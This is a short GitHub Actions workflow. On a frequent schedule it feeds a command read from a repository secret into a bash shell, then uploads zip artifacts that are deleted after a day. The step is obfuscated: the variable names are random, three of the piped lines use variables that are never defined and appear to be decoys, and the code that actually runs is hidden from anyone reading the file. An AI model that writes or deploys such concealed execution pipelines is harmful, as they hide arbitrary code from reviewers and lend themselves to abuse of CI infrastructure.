name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '55 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          hqs243: ${{ secrets.hqs243 }}
        run: |
          printf '%s' "$hqs243" | jq -r .ucrd19503 | /bin/bash
          echo $vern3177 | jq -r .irag96 | /bin/bash
          printf '%s' "$m2424" | jq -r .fcuqf9382 | /bin/bash
          echo $nqxpc234 | jq -r .tby75728 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: GyzJEhCp
          path: "*.zip"
          retention-days: 1
